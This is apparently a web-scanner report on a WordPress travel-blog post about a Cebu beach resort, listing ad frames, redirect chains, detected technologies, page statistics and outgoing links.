&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224
Frame ID: AF47E3BF1806C2D31A4AEC07DC5E2FFB
Requests: 15 HTTP requests in this frame

Frame: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=1313&slotname=1929479831&adk=1389158022&adf=3725392101&pi=t.ma~as.1929479831&w=254&cr_col=1&cr_row=6&lmt=1617333066&rafmt=9&psa=0&format=254x1313&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&crui=pub_control_image_card_stacked&wgl=1&dt=1617333065842&bpp=2&bdt=341&idt=233&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=578&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=8&uci=a!8&fsb=1&xpc=iWA0bk5tzq&p=https%3A//www.itravelrox.com&dtd=237
Frame ID: 3A61152D13AC169FB69822DE7BDB7B6C
Requests: 24 HTTP requests in this frame

Frame: https://pagead2.googlesyndication.com/bg/71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js
Frame ID: B8A07577237683B0544F335E9992661C
Requests: 1 HTTP requests in this frame

Frame: https://pagead2.googlesyndication.com/bg/71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js
Frame ID: 276F1C2EDAD7C919B54492E44916E965
Requests: 1 HTTP requests in this frame

Frame: https://pagead2.googlesyndication.com/bg/71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js
Frame ID: A70121D89F2612EFE82CCC525E684AF5
Requests: 1 HTTP requests in this frame

Frame: https://pagead2.googlesyndication.com/pagead/s/cookie_push_onload.html
Frame ID: 5297022B0BE11ECF538E2035B832F77A
Requests: 9 HTTP requests in this frame

Frame: https://sherpa.agoda.com/Static/Index?ReferenceKey=obYl0BHxMMiU7D8PQ33upA%3D%3D&Language=en-us&Hg=300px&Wd=300px&OverideConf=false&Layout=SquareStatic&MobOptimized=true&Ver=1.03&Crt=7219864560299
Frame ID: C273F25511FA937C80A988ED8087E206
Requests: 9 HTTP requests in this frame

Frame: https://pagead2.googlesyndication.com/pagead/s/cookie_push_onload.html
Frame ID: 814D55C01A1F6996D5C38668F399B51D
Requests: 9 HTTP requests in this frame

Frame: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=600&slotname=9184309326&adk=3021105814&adf=3537862397&pi=t.ma~as.9184309326&w=254&fwrn=4&fwrnh=100&lmt=1617333067&rafmt=1&to=pso&psa=0&channel=WordPressSinglePost%2Bpso-lv-9&format=254x600&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=4&wgl=1&dt=1617333067000&bpp=1&bdt=1499&idt=1&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280%2C254x1313&nras=1&correlator=8191862741585&pv_ch=WordPressSinglePost%2B&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=2647&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&psts=AGkb-H9UrwTSQackQLSDI7eMpxKeHb0NSEm26uJiZM8xxUnxCPMz_l31AImRRR4aVxlVHXSo1MuK16vX_BPMNw%2CAGkb-H9OVp-hheL8SD1ARnWoTiEjvF2QAViDOvagSjEQtSj2LnrLKUdV4N5k8ToKLUQeoBcFVq_TU63z6A%2CAGkb-H9brB_acrGSAe_xTJMLlbMyuVfnbbrB0_KPjK3HS7AQACrHHlETZ4PSrcQ-Jz9E5RzBVBeurJQI6TlCGA%2CAGkb-H-IfgdzPLdq6K0S0RtP9FSu1T6F_4Sd3qHofNx5RHx8KwnZgia2z_3-4cFD1vbqyHkrVj8LH2Li8T4&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeEbr%7C&abl=CS&pfx=0&cms=2&fu=8320&bc=31&ifi=9&uci=a!9&btvi=4&fsb=1&xpc=e8LaLYVEMc&p=https%3A//www.itravelrox.com&dtd=6
Frame ID: 2C64F500B08D546427EB30C2C010ECBC
Requests: 1 HTTP requests in this frame

Frame: https://pagead2.googlesyndication.com/bg/71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js
Frame ID: C3F0FF7C28FE4AC763C16BCE58EB2C4F
Requests: 1 HTTP requests in this frame

Frame: https://www.booking.com/flexiproduct.html?product=banner&w=250&h=250&lang=en-US&aid=1544504&target_aid=1544504&tmpl=affiliate_banner&fid=1617333067153&
Frame ID: 886FEF25D839AE76E243EC8C8B601970
Requests: 6 HTTP requests in this frame

Frame: https://affiliate.klook.com/v3/affsrv/ads/render?prod=banner&w=250&h=250&lang=en&adid=28623&wid=3871&bgtype=Klook&kepler_id=86c61726-8434-4556-96c0-ead7b7526ea6
Frame ID: 3E070E0277740E20A2F625D2377A97E8
Requests: 6 HTTP requests in this frame

Frame: https://tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/300x600_Crypto3_CYSEC.html
Frame ID: E33425E9FAF7C4C1958CA23F06B241DD
Requests: 9 HTTP requests in this frame

Frame: https://googleads.g.doubleclick.net/pagead/adview?ai=CjgcHS4tmYPi9AeGqlQe8u6qwDK_Yg_VhidDL89cNloLNhYgWEAEgxc-fE2CViriCyAegAercgNECyAEJqQJxPlAMeI6pPqgDAcgDSKoElQJP0J8odc57SDkxkHngzKDoRs8OB6kaeapJOmObvG80GQJsiBgNMGK197a8yhcyQ-d1PUII_9DOSIcP1q9px7xCxoeqg80K1aucyH-0ZnMRQFrkAQaR1pZMmmNJUzrKF6chuVLlrzBN28aGLeWYDkBgASkILUlg6HaanME3CJ4SNpM24DMHZvrCwgaUHHZaM5pfzCmHDduZ4WdORSy0OXLS8fJX2u701qvV4UuzxtACKbDVNu1PTmybp9-EXLBHiV28_ZGsFNY7ZyEpY9QmEZm1nebBpnYMChb222k3Q1OTyi8NqAVqRBxLwNpGWDAdncBsm1zBFr7Cu7jQrvvJlKe9qCKKfiyKFvH0gFAGjYR4eguvsvoNwATYjcSetAOSBQQIBBgBkgUECAUYBKAGLoAH_qL_rgGoB9XJG6gH8NkbqAfy2RuoB47OG6gHk9gbqAe6BqgH7paxAqgHpr4bqAfs1RvYBwDyBwQQqNwq0ggJCIDhgBAQARgfgAoByAsB2BMN0BUBgBcBshcaChgIABIUcHViLTY3NjE2MTE4ODAzNTEwNTM&sigh=nmHY6V-xMN8&template_id=419&tpd=AGWhJmvg-7IAWBuAq_I6f8t0uKSSYqt9nm2vtBahOdYx6KOhAA
Frame ID: 76787A441035AB81B983444BD214C2F8
Requests: 7 HTTP requests in this frame

Frame: https://googleads.g.doubleclick.net/pagead/drt/si
Frame ID: EA74C19A9A56F18C239E391590B4AD9A
Requests: 2 HTTP requests in this frame

Frame: https://tpc.googlesyndication.com/sodar/sodar2/222/runner.html
Frame ID: 102B9D3E73B9C790F4BC1ABF4A8CF48A
Requests: 2 HTTP requests in this frame

Screenshot
Live screenshot

Full Image

Page URL History Show full URLs

http://itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu HTTP 301
https://itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu HTTP 301
https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/ Page URL

Detected technologies

WordPress (CMS) Expand

Overall confidence: 100%
Detected patterns

html /<link rel=["']stylesheet["'] [^>]+\/wp-(?:content|includes)\//i
script /\/wp-(?:content|includes)\//i
headers link /rel="https:\/\/api\.w\.org\/"/i
html /<!-- This site is optimized with the Yoast (?:WordPress )?SEO plugin v([\d.]+) -/i

PHP (Programming Languages) Expand

Overall confidence: 100%
Detected patterns

html /<link rel=["']stylesheet["'] [^>]+\/wp-(?:content|includes)\//i
script /\/wp-(?:content|includes)\//i
headers link /rel="https:\/\/api\.w\.org\/"/i
html /<!-- This site is optimized with the Yoast (?:WordPress )?SEO plugin v([\d.]+) -/i

MySQL (Databases) Expand

Overall confidence: 100%
Detected patterns

html /<link rel=["']stylesheet["'] [^>]+\/wp-(?:content|includes)\//i
script /\/wp-(?:content|includes)\//i
headers link /rel="https:\/\/api\.w\.org\/"/i
html /<!-- This site is optimized with the Yoast (?:WordPress )?SEO plugin v([\d.]+) -/i

Yoast SEO (SEO) Expand

Overall confidence: 100%
Detected patterns

html /<!-- This site is optimized with the Yoast (?:WordPress )?SEO plugin v([\d.]+) -/i

CloudFlare (CDN) Expand

Overall confidence: 100%
Detected patterns

headers server /^cloudflare$/i

Facebook (Widgets) Expand

Overall confidence: 100%
Detected patterns

script /\/\/connect\.facebook\.net\/[^/]*\/[a-z]*\.js/i

Google AdSense (Advertising Networks) Expand

Overall confidence: 100%
Detected patterns

script /googlesyndication\.com\//i

Google Analytics (Analytics) Expand

Overall confidence: 100%
Detected patterns

script /google-analytics\.com\/(?:ga|urchin|analytics)\.js/i

Google Font API (Font Scripts) Expand

Overall confidence: 100%
Detected patterns

html /<link[^>]* href=[^>]+fonts\.(?:googleapis|google)\.com/i

Page Statistics

219
Requests

100 %
HTTPS

55 %
IPv6

32
Domains

47
Subdomains

39
IPs

6
Countries

2578 kB
Transfer

5577 kB
Size

9
Cookies

13 Outgoing links

These are links going to different origins than the main page.

URL: https://itravelrox.com/
Title: Home

Search URL Search Domain Scan URL

URL: https://www.agoda.com/partners/partnersearch.aspx?pcs=1&cid=1759613
Title: Agoda

Search URL Search Domain Scan URL

URL: https://www.booking.com/s/34_6/sherox47
Title: Booking.com

Search URL Search Domain Scan URL

URL: https://itravelrox.wordpress.com/
Title: roxannetamayo

Search URL Search Domain Scan URL

URL: https://gravatar.com/iamthereseann
Title: TeeRis

Search URL Search Domain Scan URL

URL: https://www.airbnb.com/c/rtamayo9
Title: <img src="https://cdn.shortpixel.ai/client/q_glossy,ret_img/https://www.itravelrox.com/wp-content/uploads/2016/07/airbnb-banner.png">

Search URL Search Domain Scan URL

URL: https://www.brandbacker.com/
Title: <img src="https://images.brandbacker.com/badges/badge_black_100.png">

Search URL Search Domain Scan URL

URL: http://www.thekindrednomads.com/
Title: <img src="https://itravelrox.com/wp-content/uploads/2016/07/the-kindred-nomads-125x125.jpg" border="0" alt="Be a Volunteer">

Search URL Search Domain Scan URL

URL: http://h24.hostg.co/41444
Title: <img style="border:0px" src="https://cdn.rawgit.com/hostinger/banners/master/affiliate-banners/en-h24/336x280.png" width="336" height="280" alt="">

Search URL Search Domain Scan URL

URL: https://www.facebook.com/itravelrox

Search URL Search Domain Scan URL

URL: https://www.twitter.com/sheroxyourworld

Search URL Search Domain Scan URL

URL: https://ph.linkedin.com/in/roxanne-tamayo-930ab128

Search URL Search Domain Scan URL

URL: https://www.instagram.com/itravelrox

Search URL Search Domain Scan URL

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

http://itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu HTTP 301
https://itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu HTTP 301
https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/ Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

Request Chain 19

https://cdn.shortpixel.ai/client/q_lqip,ret_wait/https://www.itravelrox.com/wp-content/uploads/2016/07/itravelrox-small-logo.png HTTP 302
https://www.itravelrox.com/wp-content/uploads/2016/07/itravelrox-small-logo.png

Request Chain 20

https://cdn.shortpixel.ai/client/q_lqip,ret_wait,w_374,h_280/https://www.itravelrox.com/wp-content/uploads/2014/06/san-fernando-cebu.jpg HTTP 302
https://www.itravelrox.com/wp-content/uploads/2014/06/san-fernando-cebu.jpg

Request Chain 21

https://cdn.shortpixel.ai/client/q_lqip,ret_wait,w_150,h_150/https://www.itravelrox.com/wp-content/uploads/2013/03/sugar-beach-resort2-150x150.jpg HTTP 302
https://www.itravelrox.com/wp-content/uploads/2013/03/sugar-beach-resort2-150x150.jpg

Request Chain 22

https://cdn.shortpixel.ai/client/q_lqip,ret_wait,w_150,h_150/https://www.itravelrox.com/wp-content/uploads/2013/05/sumilon-island-150x150.jpg HTTP 302
https://www.itravelrox.com/wp-content/uploads/2013/05/sumilon-island-150x150.jpg

Request Chain 23

https://cdn.shortpixel.ai/client/q_lqip,ret_wait,w_150,h_150/https://www.itravelrox.com/wp-content/uploads/2013/03/sta-fe-beach-club1-150x150.jpg HTTP 302
https://www.itravelrox.com/wp-content/uploads/2013/03/sta-fe-beach-club1-150x150.jpg

Request Chain 24

https://cdn.shortpixel.ai/client/q_lqip,ret_wait,w_150,h_150/https://www.itravelrox.com/wp-content/uploads/2013/04/ogtong-cave-5-150x150.jpg HTTP 302
https://www.itravelrox.com/wp-content/uploads/2013/04/ogtong-cave-5-150x150.jpg

Request Chain 25

https://cdn.shortpixel.ai/client/q_lqip,ret_wait,w_150,h_150/https://www.itravelrox.com/wp-content/uploads/2013/04/budyong-beach-150x150.jpg HTTP 302
https://www.itravelrox.com/wp-content/uploads/2013/04/budyong-beach-150x150.jpg

Request Chain 26

https://cdn.shortpixel.ai/client/q_lqip,ret_wait,w_150,h_150/https://www.itravelrox.com/wp-content/uploads/2014/04/p1250186a-150x150.jpg HTTP 302
https://www.itravelrox.com/wp-content/uploads/2014/04/p1250186a-150x150.jpg

Request Chain 27

https://www.paypal.com/en_US/i/btn/btn_donateCC_LG.gif HTTP 301
https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif

Request Chain 28

https://cdn.shortpixel.ai/client/q_lqip,ret_wait/https://www.itravelrox.com/wp-content/uploads/2016/07/airbnb-banner.png HTTP 302
https://www.itravelrox.com/wp-content/uploads/2016/07/airbnb-banner.png

Request Chain 29

https://banner.agoda.com/js/show_ads.js HTTP 301
https://www.agoda.com/

Request Chain 31

https://cdn.shortpixel.ai/client/q_lqip,ret_wait/https://www.itravelrox.com/wp-content/themes/zerif-lite/images/map25-redish.png HTTP 302
https://www.itravelrox.com/wp-content/themes/zerif-lite/images/map25-redish.png

Request Chain 32

https://cdn.shortpixel.ai/client/q_lqip,ret_wait/https://www.itravelrox.com/wp-content/themes/zerif-lite/images/envelope4-green.png HTTP 302
https://www.itravelrox.com/wp-content/themes/zerif-lite/images/envelope4-green.png

Request Chain 33

https://cdn.shortpixel.ai/client/q_lqip,ret_wait/https://www.itravelrox.com/wp-content/themes/zerif-lite/images/telephone65-blue.png HTTP 302
https://www.itravelrox.com/wp-content/themes/zerif-lite/images/telephone65-blue.png

Request Chain 164

https://id.rlcdn.com/466606.gif?cparams=google_push%3DAQvitUILMYPpeZopDagQtekaBfoIHBkakwEHutc7sIlI9m1dph7ako1npOoUKz8P5gIpB5TFQAX0Uou3yAoIVVrwfzOrjV9Fc_9I&google_gid=CAESEJCf_jXCUDWShEEU86R6W8E&google_cver=1 HTTP 307
https://id.rlcdn.com/1000.gif?memo=CK69HBoNCMuWmoMGEgUI6AcQAEIASnBnb29nbGVfcHVzaD1BUXZpdFVJTE1ZUHBlWm9wRGFnUXRla2FCZm9JSEJrYWt3RUh1dGM3c0lsSTltMWRwaDdha28xbnBPb1VLejhQNWdJcEI1VEZRQVgwVW91M3lBb0lWVnJ3ZnpPcmpWOUZjXzlJ HTTP 307
https://cm.g.doubleclick.net/pixel?google_nid=liveramp&google_hm=WGMzMDcwYVNFdUJiQmVwTVd2NDRWaWk0U3dRTTFzNFc5UnA2OEtIa3NUSk1XWXVmUQ==&google_push

Request Chain 165

https://rtb.openx.net/sync/dds?google_gid=CAESEKphPwnMgTjK7V1HnSb10ww&google_cver=1&google_push=AQvitULxIdO-fvE7UTHx26aQ2TA3kAw-ZZ72jP0vDEXhI7cv0bKA1LZ5FdqImWezFJ4eXUdJ_Jf0m5wVvLrcLn_jov0Pt-a-ywI HTTP 302
https://rtb.openx.net/sync/dds?google_gid=CAESEKphPwnMgTjK7V1HnSb10ww&google_cver=1&google_push=AQvitULxIdO-fvE7UTHx26aQ2TA3kAw-ZZ72jP0vDEXhI7cv0bKA1LZ5FdqImWezFJ4eXUdJ_Jf0m5wVvLrcLn_jov0Pt-a-ywI&ox_sc=1 HTTP 302
https://cm.g.doubleclick.net/pixel?google_nid=open&google_push=AQvitULxIdO-fvE7UTHx26aQ2TA3kAw-ZZ72jP0vDEXhI7cv0bKA1LZ5FdqImWezFJ4eXUdJ_Jf0m5wVvLrcLn_jov0Pt-a-ywI&google_hm=jFhGaOJvwhcempX9hXIw-Q==

Request Chain 166

https://image6.pubmatic.com/AdServer/UCookieSetPug?oid=1&rd=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dpmeb%26google_sc%3D1%26google_hm%3D%23%23B64_16B_PM_UID%26google_redir%3Dhttps%25253A%25252F%25252Fimage8.pubmatic.com%25252FAdServer%25252FImgSync%25253Fsec%25253D1%252526p%25253D156578%252526mpc%25253D4%252526fp%25253D1%252526pu%25253Dhttps%2525253A%2525252F%2525252Fimage4.pubmatic.com%2525252FAdServer%2525252FSPug%2525253Fp%2525253D156578%25252526sc%2525253D1&google_gid=CAESEEMrs5K6TDkzyk8udyW6uG4&google_cver=1&google_push=AQvitUIVnSqsWd0gCrnm7wSVOGtvUZ11_7S5MPpYZU0zaz6a2T4NVySwjCNtkql5UVcCOOGeyemk-TpUiCPAglM_r7mOV32tc0Zw HTTP 302
https://image6.pubmatic.com/AdServer/UCookieSetPug?oid=1&rd=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dpmeb%26google_sc%3D1%26google_hm%3D%23%23B64_16B_PM_UID%26google_redir%3Dhttps%25253A%25252F%25252Fimage8.pubmatic.com%25252FAdServer%25252FImgSync%25253Fsec%25253D1%252526p%25253D156578%252526mpc%25253D4%252526fp%25253D1%252526pu%25253Dhttps%2525253A%2525252F%2525252Fimage4.pubmatic.com%2525252FAdServer%2525252FSPug%2525253Fp%2525253D156578%25252526sc%2525253D1&google_gid=CAESEEMrs5K6TDkzyk8udyW6uG4&google_cver=1&google_push=AQvitUIVnSqsWd0gCrnm7wSVOGtvUZ11_7S5MPpYZU0zaz6a2T4NVySwjCNtkql5UVcCOOGeyemk-TpUiCPAglM_r7mOV32tc0Zw&rdf=1 HTTP 302
https://cm.g.doubleclick.net/pixel?google_nid=pmeb&google_sc=1&google_hm=DOoo2jzrRQiT8_S2BVeZ4A%3D%3D&google_redir=https%3A%2F%2Fimage8.pubmatic.com%2FAdServer%2FImgSync%3Fsec%3D1%26p%3D156578%26mpc%3D4%26fp%3D1%26pu%3Dhttps%253A%252F%252Fimage4.pubmatic.com%252FAdServer%252FSPug%253Fp%253D156578%2526sc%253D1&google_push=AQvitUIVnSqsWd0gCrnm7wSVOGtvUZ11_7S5MPpYZU0zaz6a2T4NVySwjCNtkql5UVcCOOGeyemk-TpUiCPAglM_r7mOV32tc0Zw

Request Chain 167

https://pixel.rubiconproject.com/exchange/sync.php?p=dfp&google_gid=CAESEAVcNoRvVmtH4HBDizNNCTo&google_cver=1&google_push=AQvitUJLqHmcCFX01kE_3mjkaJJN3WHC3ON5eyYRbb6CWEmSGa5pNiZoW_wXDLi7JTB1lOlsYzcYyw00qNpKgujC5rvRtlkChrI HTTP 302
https://cm.g.doubleclick.net/pixel?google_nid=rp&google_hm=S01aUUNMSUEtMy03V0hW&google_push=AQvitUJLqHmcCFX01kE_3mjkaJJN3WHC3ON5eyYRbb6CWEmSGa5pNiZoW_wXDLi7JTB1lOlsYzcYyw00qNpKgujC5rvRtlkChrI

Request Chain 168

https://ssum-sec.casalemedia.com/usermatchredir?s=184023&cb=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dindex%26google_hm%3D&google_gid=CAESEM-6w14NQqpi_XhZ5ER0pJ8&google_cver=1&google_push=AQvitUIK3YoDq--PObpUakKQZwpFqA3vGPDRWfkMe6BJSNuVeMcQGko8TaTXS3nzANasMeQj256uMc_nccFbL2p6qu613XEZzg1G HTTP 302
https://ssum-sec.casalemedia.com/usermatchredir?cb=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dindex%26google_hm%3D&google_cver=1&google_gid=CAESEM-6w14NQqpi_XhZ5ER0pJ8&google_push=AQvitUIK3YoDq--PObpUakKQZwpFqA3vGPDRWfkMe6BJSNuVeMcQGko8TaTXS3nzANasMeQj256uMc_nccFbL2p6qu613XEZzg1G&s=184023&C=1 HTTP 302
https://cm.g.doubleclick.net/pixel?google_nid=index&google_hm=YGaLS8v3KqYvLxF0RhySFQAAApAAAAIB&google_gid=CAESEM-6w14NQqpi_XhZ5ER0pJ8&google_push=AQvitUIK3YoDq--PObpUakKQZwpFqA3vGPDRWfkMe6BJSNuVeMcQGko8TaTXS3nzANasMeQj256uMc_nccFbL2p6qu613XEZzg1G&google_cver=1

Request Chain 171

https://cdn.shortpixel.ai/client/to_webp,q_glossy,ret_img/https://www.itravelrox.com/wp-content/uploads/2016/07/itravelrox-small-logo.png HTTP 302
https://www.itravelrox.com/wp-content/uploads/2016/07/itravelrox-small-logo.png

Request Chain 182

https://cms.quantserve.com/dpixel?a=p-n5vvLvRdjg0ek&eid=0&qc_google_push=&google_gid=CAESEOU5FYel-10cqE3MmdyD29w&google_cver=1&google_push=AQvitUIROOGkcUqdW9Ws5Qf_WyOf-S5npvPSwGX44y-Mfrv0euRpgOdXeYF6J3-Nc-MeQT0eZQCl5tJC-bfbCmaRmlbyipPbo_ST HTTP 302
https://cm.g.doubleclick.net/pixel?gdpr=1&google_nid=B765081F39B1F7&google_push=AQvitUIROOGkcUqdW9Ws5Qf_WyOf-S5npvPSwGX44y-Mfrv0euRpgOdXeYF6J3-Nc-MeQT0eZQCl5tJC-bfbCmaRmlbyipPbo_ST&google_hm=V_SwkqAXFGInUP2C4ypjoA

Request Chain 183

https://pixel.everesttech.net/1/m?url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Deverest%26google_hm%3D__EFGSURFER_USB64__%26google_push%3DAQvitUI6ipmgot2OM0lbk5NxwxtpGzr6S84W1W_glFdT0iJqwn8Y-WbZ3WvX8eQJ0FrUOlglLHKbptxQJlyjC30ywufQjmISF7z_&google_gid=CAESEFwkx_b1IF34gTRXmmD5E4c&google_cver=1 HTTP 302
https://cm.g.doubleclick.net/pixel?google_nid=everest&google_hm=WUdhTFN3QUFBY1AwM2poaw&google_push=AQvitUI6ipmgot2OM0lbk5NxwxtpGzr6S84W1W_glFdT0iJqwn8Y-WbZ3WvX8eQJ0FrUOlglLHKbptxQJlyjC30ywufQjmISF7z_

Request Chain 185

https://rtb.openx.net/sync/dds?google_gid=CAESEKf_LiGQ906h9c7_DHMHDrk&google_cver=1&google_push=AQvitUK3E11YwuAsYD7FX1Em6vFNV6c9Unvzb4m8Vm6Bjy7vDIhEBnr6JxN_SZHpTnDQVpCdwzQNrEs4Y-qHuXlFjZ6ARtHkHIsX HTTP 302
https://rtb.openx.net/sync/dds?google_gid=CAESEKf_LiGQ906h9c7_DHMHDrk&google_cver=1&google_push=AQvitUK3E11YwuAsYD7FX1Em6vFNV6c9Unvzb4m8Vm6Bjy7vDIhEBnr6JxN_SZHpTnDQVpCdwzQNrEs4Y-qHuXlFjZ6ARtHkHIsX&ox_sc=1 HTTP 302
https://cm.g.doubleclick.net/pixel?google_nid=open&google_push=AQvitUK3E11YwuAsYD7FX1Em6vFNV6c9Unvzb4m8Vm6Bjy7vDIhEBnr6JxN_SZHpTnDQVpCdwzQNrEs4Y-qHuXlFjZ6ARtHkHIsX&google_hm=jFhGaOJvwhcempX9hXIw-Q==

Request Chain 186

https://image6.pubmatic.com/AdServer/UCookieSetPug?oid=1&rd=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dpmeb%26google_sc%3D1%26google_hm%3D%23%23B64_16B_PM_UID%26google_redir%3Dhttps%25253A%25252F%25252Fimage8.pubmatic.com%25252FAdServer%25252FImgSync%25253Fsec%25253D1%252526p%25253D156578%252526mpc%25253D4%252526fp%25253D1%252526pu%25253Dhttps%2525253A%2525252F%2525252Fimage4.pubmatic.com%2525252FAdServer%2525252FSPug%2525253Fp%2525253D156578%25252526sc%2525253D1&google_gid=CAESEJXV6Jv9cdbe4Hk8iluT2mY&google_cver=1&google_push=AQvitUIMCthdV8CFqnblKB-tUpVM7obHvRGGuRShOOsa-6tcegbeOFnjsGowhOP60KDxZ3yHwYaYbBA-8DHVytpP1WfxMlZp_HvG HTTP 302
https://image6.pubmatic.com/AdServer/UCookieSetPug?oid=1&rd=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dpmeb%26google_sc%3D1%26google_hm%3D%23%23B64_16B_PM_UID%26google_redir%3Dhttps%25253A%25252F%25252Fimage8.pubmatic.com%25252FAdServer%25252FImgSync%25253Fsec%25253D1%252526p%25253D156578%252526mpc%25253D4%252526fp%25253D1%252526pu%25253Dhttps%2525253A%2525252F%2525252Fimage4.pubmatic.com%2525252FAdServer%2525252FSPug%2525253Fp%2525253D156578%25252526sc%2525253D1&google_gid=CAESEJXV6Jv9cdbe4Hk8iluT2mY&google_cver=1&google_push=AQvitUIMCthdV8CFqnblKB-tUpVM7obHvRGGuRShOOsa-6tcegbeOFnjsGowhOP60KDxZ3yHwYaYbBA-8DHVytpP1WfxMlZp_HvG&rdf=1 HTTP 302
https://cm.g.doubleclick.net/pixel?google_nid=pmeb&google_sc=1&google_hm=9mjYBgwrQBeaD5-0TREzVw%3D%3D&google_redir=https%3A%2F%2Fimage8.pubmatic.com%2FAdServer%2FImgSync%3Fsec%3D1%26p%3D156578%26mpc%3D4%26fp%3D1%26pu%3Dhttps%253A%252F%252Fimage4.pubmatic.com%252FAdServer%252FSPug%253Fp%253D156578%2526sc%253D1&google_push=AQvitUIMCthdV8CFqnblKB-tUpVM7obHvRGGuRShOOsa-6tcegbeOFnjsGowhOP60KDxZ3yHwYaYbBA-8DHVytpP1WfxMlZp_HvG

Request Chain 187

https://pixel.rubiconproject.com/exchange/sync.php?p=dfp&google_gid=CAESEKFi5nLfpda2yJmQQ8s7mKE&google_cver=1&google_push=AQvitUIVnMrD--Ve2DgNTzGPmLamD0s1pa1MT1XIB366RL9ckuX9bim-Yw6DIo7jdVzzlslhddYs0Xr_-ETYbQ1XDK_VZhvAKDWZ HTTP 302
https://cm.g.doubleclick.net/pixel?google_nid=rp&google_hm=S01aUUNMSk0tQy01SFZW&google_push=AQvitUIVnMrD--Ve2DgNTzGPmLamD0s1pa1MT1XIB366RL9ckuX9bim-Yw6DIo7jdVzzlslhddYs0Xr_-ETYbQ1XDK_VZhvAKDWZ

Request Chain 188

https://ssum-sec.casalemedia.com/usermatchredir?s=184023&cb=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dindex%26google_hm%3D&google_gid=CAESEO5KbdsaRHh9SqZenhnt_Lc&google_cver=1&google_push=AQvitUI0xRGexIvprOKXUCZV-a6j9t3dEz54nvrj8cumfQ953Ji-HyrhFo0cHfueTUyaXI4VUmZlmWKVTHQaCgFanpKSW2xpnXv8 HTTP 302
https://ssum-sec.casalemedia.com/usermatchredir?cb=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dindex%26google_hm%3D&google_cver=1&google_gid=CAESEO5KbdsaRHh9SqZenhnt_Lc&google_push=AQvitUI0xRGexIvprOKXUCZV-a6j9t3dEz54nvrj8cumfQ953Ji-HyrhFo0cHfueTUyaXI4VUmZlmWKVTHQaCgFanpKSW2xpnXv8&s=184023&C=1 HTTP 302
